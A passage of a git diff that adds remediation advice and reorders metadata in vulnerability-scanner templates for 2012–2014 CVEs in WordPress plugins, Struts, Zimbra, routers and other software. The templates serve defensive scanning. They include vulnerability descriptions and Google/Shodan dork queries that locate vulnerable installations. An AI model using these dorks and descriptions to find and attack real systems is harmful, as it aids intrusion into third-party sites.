in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + remediation: | + Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 - https://www.exploit-db.com/exploits/36848 @@ -17,13 +19,13 @@ info: cve-id: CVE-2012-5321 cwe-id: CWE-20 epss-score: 0.02634 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* epss-percentile: 0.88997 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.html:"tiki wiki" vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" tags: cve,cve2012,redirect,tikiwiki,groupware http: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 7038a6011c..016edb6791 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + remediation: | + Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.00828 - cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* epss-percentile: 0.79806 + cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress_integrator_project diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index c63c685d5f..af0a0420f5 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + remediation: | + Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: - https://www.exploit-db.com/exploits/18350 - https://wordpress.org/plugins/age-verification @@ -16,8 +18,8 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* epss-percentile: 0.83485 + cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: age_verification_project diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 5015946992..439b8a9903 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -5,19 +5,19 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. reference: - http://struts.apache.org/development/2.x/docs/s2-012.html - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - https://bugzilla.redhat.com/show_bug.cgi?id=967655 - remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* epss-percentile: 0.79616 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index b0dcaec8c7..781bcf578a 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -5,21 +5,21 @@ info: author: 0x_Akoko severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - https://www.exploit-db.com/exploits/38666 - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 - https://cwiki.apache.org/confluence/display/WW/S2-017 - http://struts.apache.org/release/2.3.x/docs/s2-017.html - http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html - remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 epss-score: 0.9734 - cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.99824 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 27e13af909..c41c320328 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -5,21 +5,21 @@ info: author: exploitation,dwisiswant0,alex severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - http://struts.apache.org/release/2.3.x/docs/s2-016.html - https://cwiki.apache.org/confluence/display/WW/S2-016 - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 - http://archiva.apache.org/security.html - http://cxsecurity.com/issue/WLB-2014010087 - remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2013-2251 cwe-id: CWE-20 epss-score: 0.97432 - cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.99902 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 vendor: apache diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index de0a837c13..5084c52336 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + remediation: | + Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - https://www.dognaedis.com/vulns/DGS-SEC-16.html @@ -14,13 +16,13 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* epss-percentile: 0.59185 + cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/uploader" vendor: roberta_bramski product: uploader + google-query: inurl:"/wp-content/plugins/uploader" tags: cve,cve2013,wordpress,xss,wp-plugin http: diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 16efbdf359..58a18da05f 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + remediation: | + Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38546 - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683 @@ -16,8 +18,8 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03568 - cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* epss-percentile: 0.90403 + cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: telaen_project diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 8594a53846..1703425ab4 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00431 - cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.71323 + cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/trafficanalyzer" vendor: wptrafficanalyzer product: trafficanalyzer + google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin http: diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 4b36a59032..3c8efa4ee6 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -5,6 +5,8 @@ info: author: Random-Robbie severity: medium description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + remediation: | + Apply the latest patches and updates for the affected software to fix the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 @@ -17,8 +19,8 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.73399 - cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* epss-percentile: 0.97675 + cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 vendor: oracle diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 9f32bd4447..296cc84781 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + remediation: | + Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - http://openwall.com/lists/oss-security/2013/07/11/11 @@ -17,13 +19,13 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* epss-percentile: 0.83576 + cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" vendor: anshul_sharma product: category-grid-view-gallery + google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve http: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 5a18c62b6f..77e759b62a 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -5,26 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - https://seclists.org/bugtraq/2013/Jul/160 - https://www.htbridge.com/advisory/HTB23162 - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - remediation: Upgrade to Duplicator 0.4.5 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* epss-percentile: 0.83576 + cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/duplicator" vendor: cory_lamle product: duplicator + google-query: inurl:"/wp-content/plugins/duplicator" tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm http: diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 2595feecb3..bb216b2fc9 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 @@ -15,8 +17,8 @@ info: cve-id: CVE-2013-5528 cwe-id: CWE-22 epss-score: 0.00442 - cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* epss-percentile: 0.71682 + cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 288a73aac7..734c242e92 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + remediation: | + Upgrade to a patched version of Xibo. reference: - https://www.exploit-db.com/exploits/26955 - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 @@ -16,8 +18,8 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.06969 - cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* epss-percentile: 0.93073 + cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: springsignage diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 09e8d32f80..b736bf450b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + remediation: | + Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - https://wordpress.org/plugins/dhtmlxspreadsheet/ @@ -17,15 +19,15 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* epss-percentile: 0.5816 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: true - framework: wordpress + max-request: 1 vendor: dhtmlx product: dhtmlxspreadsheet + framework: wordpress + google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin http: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 736dca7dc7..4378843f5e 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -5,6 +5,8 @@ info: author: rubina119 severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + remediation: | + Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 @@ -17,8 +19,8 @@ info: cve-id: CVE-2013-7091 cwe-id: CWE-22 epss-score: 0.97375 - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99856 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: synacor diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 63e153acaa..fdc08b7c1c 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + remediation: | + Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 @@ -17,13 +19,13 @@ info: cve-id: CVE-2013-7240 cwe-id: CWE-22 epss-score: 0.19842 - cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* epss-percentile: 0.95661 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" vendor: westerndeal product: advanced_dewplayer + google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress http: diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index abe35b68fc..8fd790c066 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html @@ -18,8 +20,8 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.33561 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-percentile: 0.96488 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 4f8ebc2918..633a147679 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + remediation: | + Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/30865 - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 @@ -16,8 +18,8 @@ info: cve-id: CVE-2014-10037 cwe-id: CWE-22 epss-score: 0.18676 - cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* epss-percentile: 0.95552 + cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: domphp diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 0d81f6f722..781ab8ce15 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + remediation: | + Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 @@ -15,8 +17,8 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* epss-percentile: 0.87539 + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eyou diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index c1d3aaa31d..a5822163de 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + remediation: | + Apply the latest firmware update provided by ZTE to fix the vulnerability reference: - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2014-2321 cwe-id: CWE-264 epss-score: 0.96364 - cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* epss-percentile: 0.99354 + cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zte diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index f18961ea83..0bc851ac31 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + remediation: | + Upgrade to a patched version of Lighttpd or apply the necessary security patches reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt @@ -17,8 +19,8 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.96912 - cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* epss-percentile: 0.99594 + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lighttpd diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index e4b9f8e694..cfde8c0f73 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + remediation: | + Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/33004 - http://seclists.org/fulldisclosure/2014/Apr/258 @@ -18,11 +20,11 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* epss-percentile: 0.78237 + cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: - max-request: 11 verified: true + max-request: 11 vendor: dompdf product: dompdf tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index ab1bdf4d22..9e6c00a923 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + remediation: Upgrade to v4.0 or later. reference: - https://www.exploit-db.com/exploits/44687 - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf - remediation: Upgrade to v4.0 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* epss-percentile: 0.75612 + cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: siemens diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 3dcf210193..4cb30ccc8f 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. reference: - https://www.kb.cert.org/vuls/id/774788 - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l - http://www.kb.cert.org/vuls/id/774788 - http://www.belkin.com/us/support-article?articleNum=109400 - https://www.exploit-db.com/exploits/38488/ - remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99198 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: belkin diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index f305011e39..298e21947b 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine. + remediation: | + Upgrade to a patched version of ElasticSearch reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120 - https://www.elastic.co/blog/logstash-1-4-3-released @@ -18,8 +20,8 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 - cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* epss-percentile: 0.97201 + 